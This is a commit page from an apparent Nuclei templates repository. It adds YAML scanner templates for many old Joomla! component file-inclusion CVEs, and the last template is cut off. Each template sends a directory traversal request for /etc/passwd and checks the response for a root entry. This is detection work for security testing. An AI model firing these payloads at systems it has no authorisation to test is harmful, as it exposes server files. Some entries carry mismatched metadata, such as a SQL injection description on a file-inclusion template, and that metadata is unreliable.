daffainfo
/
my-nuclei-templates
mirror of https://github.com/daffainfo/my-nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Nuclei 8.6.6

main
daffainfo 2021-11-10 05:49:13 +07:00
parent 3a091d3477
commit 4faf4dc1d6
110 changed files with 3076 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
CVE-2007-4504.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2007-4504
info:
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
tags: cve,cve2007,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2008-6080.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6080
info:
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2008-6222.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6222
info:
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-1496.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-1496
info:
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-2015.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-2015
info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-2100.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-2100
info:
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-3053.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-3053
info:
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-3318.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-3318
info:
name: Joomla! Component com_album 1.14 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-4202.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-4202
info:
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2009-4679.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-4679
info:
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2009,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0157.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0157
info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
reference:
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
CVE-2010-0467.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2010-0467
info:
name: Joomla! Component CCNewsLetter - Local File Inclusion
author: daffainfo
severity: medium
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
tags: cve,cve2010,joomla,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.80
cve-id: CVE-2010-0467
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0696.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Download
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0759.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0759
info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0942.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0942
info:
name: Joomla! Component com_jvideodirect - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0972.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0972
info:
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-0982.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0982
info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1056.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1081.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1081
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1217.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1217
info:
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1302.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1302
info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1315.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1315
info:
name: Joomla! Component webERPcustomer - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11999
- https://www.cvedetails.com/cve/CVE-2010-1315
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1340.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1340
info:
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1461.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1461
info:
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1469.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1469
info:
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1478.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1478
info:
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12145
- https://www.cvedetails.com/cve/CVE-2010-1478
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1491.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1491
info:
name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12318
- https://www.cvedetails.com/cve/CVE-2010-1491
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1540.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1540
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
reference: |
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1603.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1603
info:
name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12284
- https://www.cvedetails.com/cve/CVE-2010-1603
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1653.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1653
info:
name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
reference:
- https://www.exploit-db.com/exploits/12430
- https://www.cvedetails.com/cve/CVE-2010-1653
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1658.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1658
info:
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12427
- https://www.cvedetails.com/cve/CVE-2010-1658
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1715.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1715
info:
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
reference:
- https://www.exploit-db.com/exploits/12174
- https://www.cvedetails.com/cve/CVE-2010-1715
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1858.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1858
info:
name: Joomla! Component SMEStorage - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11853
- https://www.cvedetails.com/cve/CVE-2010-1858
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1873.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1873
info:
name: Joomla! Component Jvehicles - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.
reference:
- https://www.exploit-db.com/exploits/11997
- https://www.cvedetails.com/cve/CVE-2010-1873
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1878.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1878
info:
name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12317
- https://www.cvedetails.com/cve/CVE-2010-1878
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1977.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1977
info:
name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12083
- https://www.cvedetails.com/cve/CVE-2010-1977
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

26
CVE-2010-1982.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2010-1982
info:
name: Joomla! Component JA Voice 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12121
- https://www.cvedetails.com/cve/CVE-2010-1982
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2045.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2045
info:
name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12595
- https://www.cvedetails.com/cve/CVE-2010-2045
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2050.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2050
info:
name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12611
- https://www.cvedetails.com/cve/CVE-2010-2050
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2128.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2128
info:
name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12607
- https://www.cvedetails.com/cve/CVE-2010-2128
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"
